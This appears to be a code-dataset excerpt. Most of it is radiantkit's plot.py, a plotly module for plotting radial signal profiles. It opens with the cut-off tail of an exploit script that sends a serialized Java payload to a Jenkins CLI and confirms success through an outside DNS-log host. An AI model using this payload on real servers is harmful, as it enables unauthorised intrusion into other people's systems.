x00\x19\x43\x4c\x49\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x46\x61\x63\x74\x6f\x72\x79\x2e\x6a\x61\x76\x61\x74\x00\x07\x63\x6f\x6e\x6e\x65\x63\x74\x73\x71\x00\x7e\x00\x13\x00\x00\x01\xdf\x71\x00\x7e\x00\x2a\x71\x00\x7e\x00\x2b\x74\x00\x05\x5f\x6d\x61\x69\x6e\x73\x71\x00\x7e\x00\x13\x00\x
00\x01\x86\x71\x00\x7e\x00\x2a\x71\x00\x7e\x00\x2b\x74\x00\x04\x6d\x61\x69\x6e\x73\x72\x00\x26\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x24\x55\x6e\x6d\x6f\x64\x69\x66\x69\x61\x62\x6c\x65\x4c\x69\x73\x74\xfc\x0f\x25\x31\xb5\xec\x8e\x10\x02\x00\x01\x4c\x00\x04\x6c\x69\x73\x74\x71\x00\x7e\x00\x0f\x77\x04\xff\xff\xff\xfd\x78\x72\x00\x2c\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x24\x55\x6e\x6d\x6f\x64\x69\x66\x69\x61\x62\x6c\x65\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x19\x42\x00\x80\xcb\x5e\xf7\x1e\x02\x00\x01\x4c\x00\x01\x63\x74\x00\x16\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x3b\x77\x04\xff\xff\xff\xfd\x78\x70\x73\x72\x00\x13\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x41\x72\x72\x61\x79\x4c\x69\x73\x74\x78\x81\xd2\x1d\x99\xc7\x61\x9d\x03\x00\x01\x49\x00\x04\x73\x69\x7a\x65\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x00\x77\x04\x00\x00\x00\x00\x78\x71\x00\x7e\x00\x39\x78\x71\x00\x7e\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x70\x00\x00\x00\x01\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x01\x74\x00\x18\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x6c\x69\x45\x6e\x74\x72\x79\x50\x6f\x69\x6e\x74\x71\x00\x7e\x00\x24\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x01\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x74\x00\x1d\x52\x50\x43\x52\x65\x71\x75\x65\x73\x74\x28\x31\x2c\x77\x61\x69\x74\x46\x6f\x72\x50\x72\x6f\x70\x65\x72\x74\x79\x29'
sock.send(payload)
time.sleep(5)
req = urllib2.Request("http://dnslog.yoyostay.top/web/devil/%s/" %ramdmum);
reqopen = urllib2.urlopen(req)
if 'True' in reqopen.read():
return info
except:
pass
| 381.559322
| 17,791
| 0.770389
| 4,671
| 22,512
| 3.707771
| 0.056733
| 0.058895
| 0.058722
| 0.078296
| 0.711069
| 0.701195
| 0.692881
| 0.678503
| 0.674693
| 0.660835
| 0
| 0.45464
| 0.020211
| 22,512
| 58
| 17,792
| 388.137931
| 0.330553
| 0.001599
| 0
| 0.04
| 0
| 0.06
| 0.936101
| 0.926089
| 0
| 1
| 0
| 0
| 0
| 1
| 0.06
| false
| 0.02
| 0.14
| 0
| 0.28
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ef630020da2b1a69b857e6213862ac955421138e
| 26,619
|
py
|
Python
|
radiantkit/plot.py
|
ggirelli/radiantkit
|
df3e57dbcda902f4f7b3796e6b8dbbf623ee36b8
|
[
"MIT"
] | 2
|
2021-03-03T09:19:25.000Z
|
2022-03-23T10:24:47.000Z
|
radiantkit/plot.py
|
ggirelli/radiantkit
|
df3e57dbcda902f4f7b3796e6b8dbbf623ee36b8
|
[
"MIT"
] | 122
|
2020-10-05T06:19:09.000Z
|
2022-02-04T18:26:20.000Z
|
radiantkit/plot.py
|
ggirelli/radiantkit
|
df3e57dbcda902f4f7b3796e6b8dbbf623ee36b8
|
[
"MIT"
] | null | null | null |
"""
@author: Gabriele Girelli
@contact: gigi.ga90@gmail.com
"""
from collections import defaultdict
import numpy as np # type: ignore
import os
import pandas as pd # type: ignore
import plotly.graph_objects as go # type: ignore
import plotly.express as px # type: ignore
from plotly.subplots import make_subplots # type: ignore
from radiantkit import distance, report, stat
from typing import Any, DefaultDict, Dict, List, Optional, Tuple
def get_axis_label(axis: str, aid: int) -> str:
    """Build a plotly axis label: the bare axis name for the first axis
    (aid <= 0), otherwise the name suffixed with the 1-based axis index."""
    if aid > 0:
        return f"{axis}{aid + 1}"
    return axis
def get_axis_range(
    trace_list: List[go.Figure], axis_type: str, axis_label: str
) -> Tuple[float, float]:
    """Overall (min, max) of ``axis_type`` values across the traces that are
    bound to ``axis_label`` (e.g. all traces whose "yaxis" is "y2")."""
    axis_key = f"{axis_type}axis"
    selected = [trace for trace in trace_list if trace[axis_key] == axis_label]
    lower = np.min([trace[axis_type].min() for trace in selected])
    upper = np.max([trace[axis_type].max() for trace in selected])
    return (lower, upper)
def add_derivative_xaxis_to_profiles(fig: go.Figure) -> go.Figure:
    """Draw a dashed horizontal zero-line across each derivative panel.

    One line is added per derivative y-axis ("y2" and "y3"), spanning the
    full x range in scaled coordinates. Returns the same figure.
    """
    for derivative_yref in ("y2", "y3"):
        fig.add_shape(
            type="line",
            x0=0,
            x1=1,
            y0=0,
            y1=0,
            xsizemode="scaled",
            ysizemode="scaled",
            line_color="#969696",
            xref="x",
            yref=derivative_yref,
            line_dash="dash",
        )
    return fig
def add_line_trace(
    fig: go.Figure,
    x0: Optional[np.ndarray],
    x1: Optional[np.ndarray],
    y0: Optional[np.ndarray],
    y1: Optional[np.ndarray],
    line_color: str = "#969696",
    **kwargs,
) -> go.Figure:
    """Append a two-point line Scatter trace from (x0, y0) to (x1, y1).

    Extra keyword arguments are forwarded to go.Scatter unchanged.
    Returns the same figure.
    """
    segment = go.Scatter(
        x=[x0, x1],
        y=[y0, y1],
        mode="lines",
        line_color=line_color,
        **kwargs,
    )
    fig.add_trace(segment)
    return fig
class ProfileMultiConditionNorm(object):
    """Radial-profile overlay across conditions, visually normalized.

    Each condition's fitted curve is drawn on its own hidden y axis so
    curve shapes can be compared even when absolute intensity ranges
    differ (as the title notes, y axes are not comparable).
    """

    html_class: str = "plot-multi-condition-normalized"
    _stub: str

    def __init__(self, stub: str):
        super(ProfileMultiConditionNorm, self).__init__()
        self._stub = stub

    def __make_scatter_trace(
        self,
        channel_data: pd.DataFrame,
        pfit: Dict[str, Dict[str, Any]],
    ) -> List[go.Scatter]:
        """Build raw-data markers and fitted-line traces per condition.

        Returns a flat list of traces; condition ``i`` is assigned y
        axis "y" (i == 0) or "y{i+1}" so each curve scales on its own.
        """
        condition_list: List[str] = sorted(list(set(channel_data["condition"])))
        panel_data = []
        for condition_idx in range(len(condition_list)):
            condition_lab = condition_list[condition_idx]
            condition_data = channel_data.loc[
                condition_lab == channel_data["condition"], :
            ]
            assert condition_lab in pfit
            assert "pfit" in pfit[condition_lab]
            # Sample the fitted polynomial. Derivative curves are not
            # shown in this normalized overlay (cf. ProfileMultiCondition),
            # so no derivative sampling is performed here.
            x, y = pfit[condition_lab]["pfit"].linspace(200)
            stat_lab = pfit[condition_lab]["stat"].value
            panel_data.extend(
                [
                    go.Scatter(
                        name=f"{condition_lab}_{stat_lab}_raw",
                        xaxis="x",
                        yaxis=get_axis_label("y", condition_idx),
                        x=condition_data["x"],
                        y=condition_data[f"{stat_lab}_raw"],
                        mode="markers",
                        legendgroup=condition_lab,
                        marker=dict(
                            size=4,
                            opacity=0.5,
                            color=px.colors.qualitative.Pastel2[condition_idx],
                        ),
                        showlegend=False,
                    ),
                    go.Scatter(
                        name=f"{condition_lab}_{stat_lab}",
                        x=x,
                        y=y,
                        xaxis="x",
                        yaxis=get_axis_label("y", condition_idx),
                        mode="lines",
                        legendgroup=condition_lab,
                        line_color=px.colors.qualitative.Dark2[condition_idx],
                    ),
                ]
            )
        return panel_data

    def __add_der_zeros(
        self, fig: go.Figure, pfit_data: Dict[str, Dict[str, Any]]
    ) -> go.Figure:
        """Mark derivative roots as vertical lines; skip NaN roots.

        Roots come from ``stat.get_radial_profile_roots``. Lines span
        the y range of the traces currently assigned to axis "y".
        """
        pfit_sorted = sorted(pfit_data.items(), key=lambda x: x[0])
        for pfit_idx in range(len(pfit_sorted)):
            condition_lab, pfit = pfit_sorted[pfit_idx]
            der_roots = stat.get_radial_profile_roots(pfit["pfit"])
            for rid in range(len(der_roots)):
                if np.isnan(der_roots[rid]):
                    continue
                # NOTE(review): root lines are drawn only on panel 0's
                # axis ("y"), i.e. scaled to the first condition's
                # traces — presumably intentional since all curves
                # overlay the same plotting area; confirm.
                pid = 0
                panel_trace_y = np.concatenate(
                    [
                        p["y"]
                        for p in fig["data"]
                        if p["yaxis"] == get_axis_label("y", pid)
                    ]
                )
                fig = add_line_trace(
                    fig,
                    der_roots[rid],
                    der_roots[rid],
                    panel_trace_y.min(),
                    panel_trace_y.max(),
                    line_dash="dot" if rid == 1 else "dash",
                    line_color=px.colors.qualitative.Set2[pfit_idx],
                    legendgroup=condition_lab,
                    showlegend=False,
                    xaxis="x",
                    yaxis=get_axis_label("y", pid),
                )
        return fig

    def __secondary_yaxes_props(
        self, pfit_data: Dict[str, List[Dict[str, Any]]]
    ) -> Dict[str, Any]:
        """Layout properties for the hidden per-condition y axes.

        Axis 0 is configured by the caller; axes 1..n-1 are invisible,
        span the full plot height, and overlay the primary "y" axis.
        """
        yaxes_props: Dict[str, Any] = {}
        for ii in range(1, len(pfit_data)):
            yaxes_props[get_axis_label("yaxis", ii)] = dict(
                domain=[0, 1],
                side="left",
                showgrid=False,
                zeroline=False,
                visible=False,
                # ii >= 1 always yields a secondary axis label, which
                # must overlay the primary axis to share its area.
                overlaying="y",
            )
        return yaxes_props

    def __make_panel(
        self,
        data: pd.DataFrame,
        pfit_data: Dict[str, List[Dict[str, Any]]],
        stat_type: stat.ProfileStatType,
        dtype: distance.DistanceType,
    ) -> go.Figure:
        """Assemble the figure for one (channel, stat) combination.

        Selects the polynomial fits matching the channel, stat and
        distance type, then overlays all conditions in a single panel.
        """
        channel_lab = data["channel"].tolist()[0]
        selected_pfits: Dict[str, Dict[str, Any]] = {}
        for condition_lab, pfit_list in pfit_data.items():
            for pfit in pfit_list:
                condition = pfit["stat"] == stat_type
                condition = condition and pfit["distance_type"] == dtype.value
                condition = condition and pfit["cname"] == channel_lab
                if condition:
                    # Key by the parent directory name, matching the
                    # "condition" labels built in _plot.
                    selected_pfits[
                        os.path.basename(os.path.dirname(condition_lab))
                    ] = pfit
        fig = make_subplots(specs=[[{"secondary_y": True}]])
        plot_data = self.__make_scatter_trace(
            data,
            selected_pfits,
        )
        for panel in plot_data:
            fig.add_trace(panel)
        fig = self.__add_der_zeros(fig, selected_pfits)
        fig.update_layout(
            template="plotly_dark",
            title=f"""Signal profile (y-axis not comparable across curves)<br>
            <sub>Channel: {channel_lab}; Stat: {stat_type.value}</sub>""".replace(
                f"\n{' '*4*3}", "\n"
            ),
            xaxis=dict(title=dtype.label, anchor="y"),
            yaxis=dict(
                showgrid=True,
                zeroline=False,
                visible=False,
            ),
            **self.__secondary_yaxes_props(pfit_data),
            autosize=False,
            width=1000,
            height=500,
        )
        return fig

    def _plot(
        self, data: DefaultDict[str, Dict[str, pd.DataFrame]], *args, **kwargs
    ) -> DefaultDict[str, Dict[str, go.Figure]]:
        """Build one figure per (channel, stat) from raw data and fits.

        Expects ``data`` to contain "raw_data" (per-directory frames)
        and "poly_fit" (per-directory fit lists); only rows for the
        lamina-normalized distance type are plotted.
        """
        distance_type = distance.DistanceType.LAMINA_NORM
        fig_data: DefaultDict[str, Dict[str, go.Figure]] = defaultdict(lambda: {})
        assert "raw_data" in data
        assert "poly_fit" in data
        condition_data = []
        for dirpath, dirdata in data["raw_data"].items():
            assert isinstance(dirdata, pd.DataFrame)
            assert dirpath in data["poly_fit"]
            condition_lab = os.path.basename(os.path.dirname(dirpath))
            distdata = dirdata.loc[
                distance_type.value == dirdata["distance_type"], :
            ].copy()
            distdata["condition"] = condition_lab
            condition_data.append(distdata)
        plottable_data = pd.concat(condition_data)
        for channel_lab in list(set(plottable_data["channel"])):
            channel_data = plottable_data.loc[
                channel_lab == plottable_data["channel"], :
            ]
            for stat_type in stat.ProfileStatType:
                fig_data[self._stub][
                    f"{channel_lab}-{stat_type.value}"
                ] = self.__make_panel(
                    channel_data,
                    data["poly_fit"],
                    stat_type,
                    distance_type,
                )
        return fig_data

    def make(
        self, output_data: DefaultDict[str, Dict[str, Any]]
    ) -> Tuple[str, List[str]]:
        """Render all figures to HTML panels.

        Returns the joined panel HTML and the sorted list of panel keys
        ("{channel}-{stat}") for building selectors in the report.
        """
        fig_data = self._plot(output_data)
        panels = "\n\t".join(
            [
                report.ReportBase.figure_to_html(
                    fig,
                    classes=[self._stub, f"{self.html_class}-panel", "hidden"],
                    data=dict(condition=os.path.basename(dpath)),
                )
                for dpath, fig in sorted(
                    fig_data[self._stub].items(), key=lambda x: x[0]
                )
            ]
        )
        return (panels, sorted(fig_data[self._stub].keys()))
class ProfileMultiCondition(object):
    """Three-panel radial-profile plot comparing conditions on shared axes.

    Top panel: raw points and fitted intensity curve per condition;
    middle and bottom panels: first and second derivatives of the fit.
    """

    html_class: str = "plot-multi-condition"
    _stub: str
    def __init__(self, stub: str):
        super(ProfileMultiCondition, self).__init__()
        self._stub = stub
    def __make_scatter_trace(
        self,
        channel_data: pd.DataFrame,
        pfit: Dict[str, Dict[str, Any]],
    ) -> List[go.Scatter]:
        """Build per-condition traces: raw markers and fitted curve on
        axis "y", first derivative on "y2", second derivative on "y3".

        Returns a flat list of go.Scatter traces.
        """
        condition_list: List[str] = sorted(list(set(channel_data["condition"])))
        panel_data = []
        for condition_idx in range(len(condition_list)):
            condition_lab = condition_list[condition_idx]
            condition_data = channel_data.loc[
                condition_lab == channel_data["condition"], :
            ]
            assert condition_lab in pfit
            assert "pfit" in pfit[condition_lab]
            # Sample the fitted polynomial and its first two derivatives
            # on 200 evenly spaced points.
            x, y = pfit[condition_lab]["pfit"].linspace(200)
            xx, yy = pfit[condition_lab]["pfit"].deriv().linspace(200)
            xxx, yyy = pfit[condition_lab]["pfit"].deriv().deriv().linspace(200)
            stat_lab = pfit[condition_lab]["stat"].value
            panel_data.extend(
                [
                    go.Scatter(
                        name=f"{condition_lab}_{stat_lab}_raw",
                        xaxis="x",
                        yaxis="y",
                        x=condition_data["x"],
                        y=condition_data[f"{stat_lab}_raw"],
                        mode="markers",
                        legendgroup=condition_lab,
                        marker=dict(
                            size=4,
                            opacity=0.5,
                            color=px.colors.qualitative.Pastel2[condition_idx],
                        ),
                        showlegend=False,
                    ),
                    go.Scatter(
                        name=f"{condition_lab}_{stat_lab}",
                        x=x,
                        y=y,
                        xaxis="x",
                        yaxis="y",
                        mode="lines",
                        legendgroup=condition_lab,
                        line_color=px.colors.qualitative.Dark2[condition_idx],
                    ),
                    go.Scatter(
                        name=f"{condition_lab}_{stat_lab}_der1",
                        x=xx,
                        y=yy,
                        xaxis="x",
                        yaxis="y2",
                        mode="lines",
                        legendgroup=condition_lab,
                        showlegend=False,
                        line_color=px.colors.qualitative.Dark2[condition_idx],
                    ),
                    go.Scatter(
                        name=f"{condition_lab}_{stat_lab}_der2",
                        x=xxx,
                        y=yyy,
                        xaxis="x",
                        yaxis="y3",
                        mode="lines",
                        legendgroup=condition_lab,
                        showlegend=False,
                        line_color=px.colors.qualitative.Dark2[condition_idx],
                    ),
                ]
            )
        return panel_data
    def __add_der_zeros(
        self, fig: go.Figure, pfit_data: Dict[str, Dict[str, Any]]
    ) -> go.Figure:
        """Mark derivative roots with vertical lines on the panels.

        NaN roots are skipped. Root ``rid`` is drawn on panels
        0..min(rid+2, 3)-1, scaled to each panel's current y range.
        """
        pfit_sorted = sorted(pfit_data.items(), key=lambda x: x[0])
        for pfit_idx in range(len(pfit_sorted)):
            condition_lab, pfit = pfit_sorted[pfit_idx]
            der_roots = stat.get_radial_profile_roots(pfit["pfit"])
            for rid in range(len(der_roots)):
                if np.isnan(der_roots[rid]):
                    continue
                for pid in range(min(rid + 2, 3)):
                    # Concatenate the y values of every trace on this
                    # panel to span the full vertical range.
                    panel_trace_y = np.concatenate(
                        [
                            p["y"]
                            for p in fig["data"]
                            if p["yaxis"] == get_axis_label("y", pid)
                        ]
                    )
                    fig = add_line_trace(
                        fig,
                        der_roots[rid],
                        der_roots[rid],
                        panel_trace_y.min(),
                        panel_trace_y.max(),
                        line_dash="dot" if rid == 1 else "dash",
                        line_color=px.colors.qualitative.Set2[pfit_idx],
                        legendgroup=condition_lab,
                        showlegend=False,
                        xaxis="x",
                        yaxis=get_axis_label("y", pid),
                    )
        return fig
    def __make_panel(
        self,
        data: pd.DataFrame,
        pfit_data: Dict[str, List[Dict[str, Any]]],
        stat_type: stat.ProfileStatType,
        dtype: distance.DistanceType,
    ) -> go.Figure:
        """Assemble the 3-row figure for one (channel, stat) pair.

        Selects fits matching channel, stat and distance type, adds all
        traces plus zero-lines and root markers, then lays out the
        intensity / 1st-derivative / 2nd-derivative panels.
        """
        channel_lab = data["channel"].tolist()[0]
        selected_pfits: Dict[str, Dict[str, Any]] = {}
        for condition_lab, pfit_list in pfit_data.items():
            for pfit in pfit_list:
                condition = pfit["stat"] == stat_type
                condition = condition and pfit["distance_type"] == dtype.value
                condition = condition and pfit["cname"] == channel_lab
                if condition:
                    # Key by the parent directory name, matching the
                    # "condition" labels built in _plot.
                    selected_pfits[
                        os.path.basename(os.path.dirname(condition_lab))
                    ] = pfit
        fig = make_subplots(rows=3, cols=1)
        plot_data = self.__make_scatter_trace(
            data,
            selected_pfits,
        )
        for panel in plot_data:
            fig.add_trace(panel)
        fig = add_derivative_xaxis_to_profiles(fig)
        fig = self.__add_der_zeros(fig, selected_pfits)
        # Compute y ranges from the data traces only (before the root
        # lines were appended) so each panel fits its curves.
        yranges = dict(
            y=get_axis_range(plot_data, "y", "y"),
            y2=get_axis_range(plot_data, "y", "y2"),
            y3=get_axis_range(plot_data, "y", "y3"),
        )
        fig.update_layout(
            template="plotly_dark",
            title=f"""Signal profile<br>
            <sub>Channel: {channel_lab}; Stat: {stat_type.value}</sub>""".replace(
                f"\n{' '*4*3}", "\n"
            ),
            xaxis=dict(title=dtype.label, anchor="y3"),
            yaxis=dict(
                domain=[0.66, 1],
                range=yranges["y"],
                title="Intensity (a.u.)",
            ),
            yaxis2=dict(
                domain=[0.33, 0.63],
                range=yranges["y2"],
                title="1st Derivative Intensity (a.u.)",
            ),
            yaxis3=dict(
                domain=[0, 0.30],
                range=yranges["y3"],
                title="2nd Derivative Intensity (a.u.)",
            ),
            autosize=False,
            width=1000,
            height=1000,
        )
        return fig
    def _plot(
        self, data: DefaultDict[str, Dict[str, pd.DataFrame]], *args, **kwargs
    ) -> DefaultDict[str, Dict[str, go.Figure]]:
        """Build one figure per (channel, stat) from raw data and fits.

        Expects ``data`` to contain "raw_data" (per-directory frames)
        and "poly_fit" (per-directory fit lists); only rows for the
        lamina-normalized distance type are plotted.
        """
        distance_type = distance.DistanceType.LAMINA_NORM
        fig_data: DefaultDict[str, Dict[str, go.Figure]] = defaultdict(lambda: {})
        assert "raw_data" in data
        assert "poly_fit" in data
        condition_data = []
        for dirpath, dirdata in data["raw_data"].items():
            assert isinstance(dirdata, pd.DataFrame)
            assert dirpath in data["poly_fit"]
            condition_lab = os.path.basename(os.path.dirname(dirpath))
            distdata = dirdata.loc[
                distance_type.value == dirdata["distance_type"], :
            ].copy()
            distdata["condition"] = condition_lab
            condition_data.append(distdata)
        plottable_data = pd.concat(condition_data)
        for channel_lab in list(set(plottable_data["channel"])):
            channel_data = plottable_data.loc[
                channel_lab == plottable_data["channel"], :
            ]
            for stat_type in stat.ProfileStatType:
                fig_data[self._stub][
                    f"{channel_lab}-{stat_type.value}"
                ] = self.__make_panel(
                    channel_data,
                    data["poly_fit"],
                    stat_type,
                    distance_type,
                )
        return fig_data
    def make(
        self, output_data: DefaultDict[str, Dict[str, Any]]
    ) -> Tuple[str, List[str]]:
        """Render all figures to HTML panels.

        Returns the joined panel HTML and the sorted list of panel keys
        ("{channel}-{stat}") for building selectors in the report.
        """
        fig_data = self._plot(output_data)
        panels = "\n\t".join(
            [
                report.ReportBase.figure_to_html(
                    fig,
                    classes=[self._stub, f"{self.html_class}-panel", "hidden"],
                    data=dict(condition=os.path.basename(dpath)),
                )
                for dpath, fig in sorted(
                    fig_data[self._stub].items(), key=lambda x: x[0]
                )
            ]
        )
        return (panels, sorted(fig_data[self._stub].keys()))
class ProfileSingleCondition(object):
    """Three-panel radial-profile plot for a single condition.

    Overlays all profile statistics (see stat.ProfileStatType) for one
    channel of one condition: intensity in the top panel, first and
    second derivatives of the fit in the lower panels.
    """

    html_class: str = "plot-single-condition"
    _stub: str
    def __init__(self, stub: str):
        super(ProfileSingleCondition, self).__init__()
        self._stub = stub
    def __make_scatter_trace(
        self,
        name: str,
        data: pd.DataFrame,
        pfit_data: List[Dict[str, Any]],
    ) -> List[go.Scatter]:
        """Build traces for every profile statistic of one channel.

        For each stat: raw markers and fitted curve on axis "y", first
        derivative on "y2", second derivative on "y3". Exactly one fit
        per stat type is expected in ``pfit_data``.
        """
        panel_data = []
        for stat_type in stat.ProfileStatType:
            pfit = [x for x in pfit_data if x["stat"] == stat_type]
            assert 1 == len(pfit), pfit
            assert "pfit" in pfit[0]
            # Sample the fitted polynomial and its first two derivatives
            # on 200 evenly spaced points.
            x, y = pfit[0]["pfit"].linspace(200)
            xx, yy = pfit[0]["pfit"].deriv().linspace(200)
            xxx, yyy = pfit[0]["pfit"].deriv().deriv().linspace(200)
            panel_data.extend(
                [
                    go.Scatter(
                        name=f"{name}_{stat_type.value}_raw",
                        xaxis="x",
                        yaxis="y",
                        x=data["x"],
                        y=data[f"{stat_type.value}_raw"],
                        mode="markers",
                        legendgroup=stat_type.value,
                        marker=dict(
                            size=4,
                            opacity=0.5,
                            # stat_type.id is presumably a stable int
                            # index per stat — used to pick a color.
                            color=px.colors.qualitative.Pastel2[stat_type.id],
                        ),
                        showlegend=False,
                    ),
                    go.Scatter(
                        name=f"{name}_{stat_type.value}",
                        x=x,
                        y=y,
                        xaxis="x",
                        yaxis="y",
                        mode="lines",
                        legendgroup=stat_type.value,
                        line_color=px.colors.qualitative.Dark2[stat_type.id],
                    ),
                    go.Scatter(
                        name=f"{name}_{stat_type.value}_der1",
                        x=xx,
                        y=yy,
                        xaxis="x",
                        yaxis="y2",
                        mode="lines",
                        legendgroup=stat_type.value,
                        showlegend=False,
                        line_color=px.colors.qualitative.Dark2[stat_type.id],
                    ),
                    go.Scatter(
                        name=f"{name}_{stat_type.value}_der2",
                        x=xxx,
                        y=yyy,
                        xaxis="x",
                        yaxis="y3",
                        mode="lines",
                        legendgroup=stat_type.value,
                        showlegend=False,
                        line_color=px.colors.qualitative.Dark2[stat_type.id],
                    ),
                ]
            )
        return panel_data
    def __add_der_zeros(
        self, fig: go.Figure, pfit_data: List[Dict[str, Any]]
    ) -> go.Figure:
        """Mark derivative roots with vertical lines on the panels.

        NaN roots are skipped. Root ``rid`` is drawn on panels
        0..min(rid+2, 3)-1, scaled to each panel's current y range.
        """
        for pfit in pfit_data:
            der_roots = stat.get_radial_profile_roots(pfit["pfit"])
            for rid in range(len(der_roots)):
                if np.isnan(der_roots[rid]):
                    continue
                for pid in range(min(rid + 2, 3)):
                    # Concatenate the y values of every trace on this
                    # panel to span the full vertical range.
                    panel_trace_y = np.concatenate(
                        [
                            p["y"]
                            for p in fig["data"]
                            if p["yaxis"] == get_axis_label("y", pid)
                        ]
                    )
                    fig = add_line_trace(
                        fig,
                        der_roots[rid],
                        der_roots[rid],
                        panel_trace_y.min(),
                        panel_trace_y.max(),
                        line_dash="dot" if rid == 1 else "dash",
                        line_color=px.colors.qualitative.Set2[pfit["stat"].id],
                        legendgroup=pfit["stat"].value,
                        showlegend=False,
                        xaxis="x",
                        yaxis=get_axis_label("y", pid),
                    )
        return fig
    def __make_panel(
        self,
        data: pd.DataFrame,
        pfit_data: List[Dict[str, Any]],
        condition_lab: str,
        channel_lab: str,
        dtype: distance.DistanceType,
    ) -> go.Figure:
        """Assemble the 3-row figure for one (condition, channel) pair.

        Filters the fits matching the channel and distance type, adds
        all traces plus zero-lines and root markers, then lays out the
        intensity / 1st-derivative / 2nd-derivative panels.
        """
        pfit = [
            x
            for x in pfit_data
            if x["cname"] == channel_lab and x["distance_type"] == dtype.value
        ]
        fig = make_subplots(rows=3, cols=1)
        plot_data = self.__make_scatter_trace(
            channel_lab,
            data.loc[channel_lab == data["channel"]],
            pfit,
        )
        for panel in plot_data:
            fig.add_trace(panel)
        fig = add_derivative_xaxis_to_profiles(fig)
        fig = self.__add_der_zeros(fig, pfit)
        # Compute y ranges from the data traces only (before the root
        # lines were appended) so each panel fits its curves.
        yranges = dict(
            y=get_axis_range(plot_data, "y", "y"),
            y2=get_axis_range(plot_data, "y", "y2"),
            y3=get_axis_range(plot_data, "y", "y3"),
        )
        fig.update_layout(
            template="plotly_dark",
            title=f"""Signal profile<br>
            <sub>Condition: {condition_lab}; Channel: {channel_lab}</sub>""".replace(
                f"\n{' '*4*3}", "\n"
            ),
            xaxis=dict(title=dtype.label, anchor="y3"),
            yaxis=dict(
                domain=[0.66, 1],
                range=yranges["y"],
                title="Intensity (a.u.)",
            ),
            yaxis2=dict(
                domain=[0.33, 0.63],
                range=yranges["y2"],
                title="1st Derivative Intensity (a.u.)",
            ),
            yaxis3=dict(
                domain=[0, 0.30],
                range=yranges["y3"],
                title="2nd Derivative Intensity (a.u.)",
            ),
            autosize=False,
            width=1000,
            height=1000,
        )
        return fig
    def _plot(
        self, data: DefaultDict[str, Dict[str, pd.DataFrame]], *args, **kwargs
    ) -> DefaultDict[str, Dict[str, go.Figure]]:
        """Build one figure per (channel, condition) from raw data.

        Expects ``data`` to contain "raw_data" and "poly_fit" keyed by
        directory path; only rows for the lamina-normalized distance
        type are plotted, and empty selections are skipped.
        """
        fig_data: DefaultDict[str, Dict[str, go.Figure]] = defaultdict(lambda: {})
        assert "raw_data" in data
        assert "poly_fit" in data
        for dirpath, dirdata in data["raw_data"].items():
            assert isinstance(dirdata, pd.DataFrame)
            assert dirpath in data["poly_fit"]
            condition_lab = os.path.basename(os.path.dirname(dirpath))
            distance_type = distance.DistanceType.LAMINA_NORM
            for channel_lab in set(dirdata["channel"]):
                distdata = dirdata.loc[distance_type.value == dirdata["distance_type"]]
                if 0 == distdata.shape[0]:
                    continue
                fig_data[self._stub][
                    f"{channel_lab}-{condition_lab}"
                ] = self.__make_panel(
                    distdata,
                    data["poly_fit"][dirpath],
                    condition_lab,
                    channel_lab,
                    distance_type,
                )
        return fig_data
    def make(
        self, output_data: DefaultDict[str, Dict[str, Any]]
    ) -> Tuple[str, List[str]]:
        """Render all figures to HTML panels.

        Returns the joined panel HTML and the sorted list of panel keys
        ("{channel}-{condition}") for building selectors in the report.
        """
        fig_data = self._plot(output_data)
        panels = "\n\t".join(
            [
                report.ReportBase.figure_to_html(
                    fig,
                    classes=[self._stub, f"{self.html_class}-panel", "hidden"],
                    data=dict(condition=os.path.basename(dpath)),
                )
                for dpath, fig in sorted(
                    fig_data[self._stub].items(), key=lambda x: x[0]
                )
            ]
        )
        return (panels, sorted(fig_data[self._stub].keys()))
| 35.730201
| 87
| 0.468838
| 2,686
| 26,619
| 4.431124
| 0.089725
| 0.045371
| 0.015124
| 0.026214
| 0.856327
| 0.84448
| 0.829945
| 0.8123
| 0.798437
| 0.775164
| 0
| 0.013782
| 0.4194
| 26,619
| 744
| 88
| 35.778226
| 0.756325
| 0.004546
| 0
| 0.766764
| 0
| 0
| 0.070566
| 0.021257
| 0
| 0
| 0
| 0
| 0.026239
| 1
| 0.033528
| false
| 0
| 0.01312
| 0.002915
| 0.088921
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
32986d45a002b327f9d0c84a98fb3f9531babe0f
| 137,699
|
py
|
Python
|
pyboto3/cognitoidentityprovider.py
|
thecraftman/pyboto3
|
653a0db2b00b06708334431da8f169d1f7c7734f
|
[
"MIT"
] | null | null | null |
pyboto3/cognitoidentityprovider.py
|
thecraftman/pyboto3
|
